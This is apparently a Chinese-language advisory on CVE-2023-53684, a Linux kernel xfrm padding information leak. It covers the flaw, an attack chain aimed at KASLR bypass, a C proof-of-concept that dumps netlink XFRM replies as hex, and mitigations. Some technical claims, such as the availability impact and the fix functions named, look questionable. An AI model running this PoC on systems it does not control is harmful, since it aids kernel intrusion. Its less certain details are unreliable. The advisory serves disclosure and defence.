CVE-2023-53684 Linux内核xfrm子系统结构体填充信息泄露漏洞

漏洞信息

漏洞编号

CVE-2023-53684

漏洞类型

信息泄露/未初始化内存泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (xfrm子系统)

漏洞概述

CVE-2023-53684是Linux内核xfrm（IPsec协议转换框架）子系统中的一个信息泄露漏洞。该漏洞源于内核在通过xfrm_user接口将算法信息（algos）和封装模板（encap template）数据拷贝至用户空间时，未对结构体中的填充字节（padding）进行清零处理。在C语言结构体中，编译器通常会自动插入填充字节以满足内存对齐要求，这些填充字节可能包含之前使用过的随机内存数据，其中可能含有敏感信息（如内核栈残留数据、堆内存残留数据或其他进程遗留的敏感信息）。当用户空间应用程序通过netlink接口调用相关dump操作时，内核会将整个结构体（包括未初始化的填充区域）完整复制到用户空间缓冲区，导致敏感数据泄露给普通用户。该漏洞的CVSS评分为5.5，属于中危级别，攻击者需要本地低权限访问即可利用，无需用户交互。虽然机密性影响被评定为低，但可用性影响为高，表明该漏洞可能导致系统不稳定或拒绝服务状态。Linux内核维护者已通过补丁修复此问题，确保在数据拷贝至用户空间之前将所有填充字节清零，从而防止敏感信息泄露。

技术细节

该漏洞的技术根源在于Linux内核xfrm_user模块中的数据序列化逻辑。具体而言，在copy_to_user态操作中，内核代码使用结构体直接拷贝的方式将xfrm算法信息（如xfrm_algo、xfrm_algo_auth、xfrm_encap_tmpl等结构）传递给用户空间应用程序。由于这些结构体在定义时存在内存对齐填充字段（例如32位字段在64位系统上可能需要8字节对齐填充），而内核在填充这些结构时仅初始化了有效数据字段，填充区域保留了栈或堆上之前的内存内容。

利用方式方面，攻击者作为本地低权限用户，可以通过以下步骤触发漏洞：
1. 创建netlink套接字并连接到NETLINK_XFRM协议族；
2. 构造特定的netlink消息请求，触发内核dump xfrm算法列表或封装模板；
3. 内核调用xfrm_msg_min或copy_to_user将结构体数据复制到用户空间缓冲区；
4. 攻击者读取返回的缓冲区数据，分析填充区域中可能泄露的敏感信息。

虽然该漏洞本身不直接导致权限提升或远程代码执行，但泄露的敏感信息可能被用于辅助其他攻击，如内核地址泄露（KASLR绕过）、栈cookie泄露等。该漏洞的修复通过在结构体拷贝前调用memset将整个结构清零，或使用memcpy_from_msg配合显式的零初始化来确保填充字节为0。

攻击链分析

STEP 1

步骤1：建立netlink通信通道

攻击者作为本地低权限用户，创建一个AF_NETLINK类型的RAW套接字，并指定NETLINK_XFRM协议族（协议号6），用于与内核xfrm子系统通信。

STEP 2

步骤2：构造特定netlink请求

攻击者构造XFRM_MSG_GETPOLICY或XFRM_MSG_GETSA等netlink消息，设置NLM_F_DUMP标志以触发内核遍历并返回所有匹配的xfrm策略或安全关联信息。

STEP 3

步骤3：触发内核结构体拷贝

内核xfrm_user模块接收到dump请求后，遍历xfrm状态或策略链表，将xfrm_algo、xfrm_algo_auth、xfrm_encap_tmpl等结构体拷贝到skb缓冲区，此过程未清零填充字节。

STEP 4

步骤4：接收并分析泄露数据

攻击者接收netlink响应消息，通过分析结构体填充区域中的非零字节，可能获取内核地址、栈残留数据或其他敏感信息，为后续攻击（如KASLR绕过）提供信息支撑。

STEP 5

步骤5：利用泄露信息进行后续攻击

基于泄露的内核内存布局信息，攻击者可以组合其他漏洞进行权限提升或内核代码执行，实现完全的系统控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2023-53684 - Linux Kernel xfrm padding information disclosure PoC
 * This PoC demonstrates how to trigger the xfrm algo/encap dump operation
 * to read uninitialized padding bytes from kernel structures.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/xfrm.h>

#define NETLINK_XFRM 6

int main(int argc, char *argv[]) {
    int nlfd;
    struct sockaddr_nl sa;
    struct {
        struct nlmsghdr nh;
        struct xfrm_userpolicy_info xpinfo;
    } req;
    char buf[4096];
    struct nlmsghdr *nlh;
    int len;

    // Create netlink socket for XFRM
    nlfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nlfd < 0) {
        perror("socket");
        return 1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;

    if (bind(nlfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(nlfd);
        return 1;
    }

    // Send XFRM_MSG_GETPOLICY to trigger dump of algo/encap structures
    memset(&req, 0, sizeof(req));
    req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_userpolicy_info));
    req.nh.nlmsg_type = XFRM_MSG_GETPOLICY;
    req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    req.nh.nlmsg_seq = 1;
    req.nh.nlmsg_pid = getpid();

    if (send(nlfd, &req, req.nh.nlmsg_len, 0) < 0) {
        perror("send");
        close(nlfd);
        return 1;
    }

    // Receive response and inspect padding bytes
    len = recv(nlfd, buf, sizeof(buf), 0);
    if (len > 0) {
        // Analyze received data for leaked padding content
        nlh = (struct nlmsghdr *)buf;
        printf("Received %d bytes from kernel\n", len);
        printf("Message type: %d\n", nlh->nlmsg_type);

        // Dump raw hex to inspect potential leaked padding
        unsigned char *p = (unsigned char *)buf;
        for (int i = 0; i < len && i < 256; i++) {
            if (i % 16 == 0) printf("\n%04x: ", i);
            printf("%02x ", p[i]);
        }
        printf("\n");
    }

    close(nlfd);
    return 0;
}

影响范围

Linux Kernel < 6.6 (主分支)

Linux Kernel 6.6.x (部分版本)

Linux Kernel 6.1.x (LTS分支)

Linux Kernel 5.15.x (LTS分支)

Linux Kernel 5.10.x (LTS分支)

Linux Kernel 5.4.x (LTS分支)

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）通过iptables或nftables限制非特权用户创建NETLINK套接字的能力；2）使用seccomp或AppArmor等强制访问控制机制限制进程对NETLINK_XFRM协议族的访问；3）移除或禁用系统中的IPsec相关功能（如果不需要），减少xfrm子系统的使用场景；4）监控系统日志，关注异常的netlink XFRM消息；5）关注Linux发行版供应商发布的安全公告，及时应用对应的安全补丁。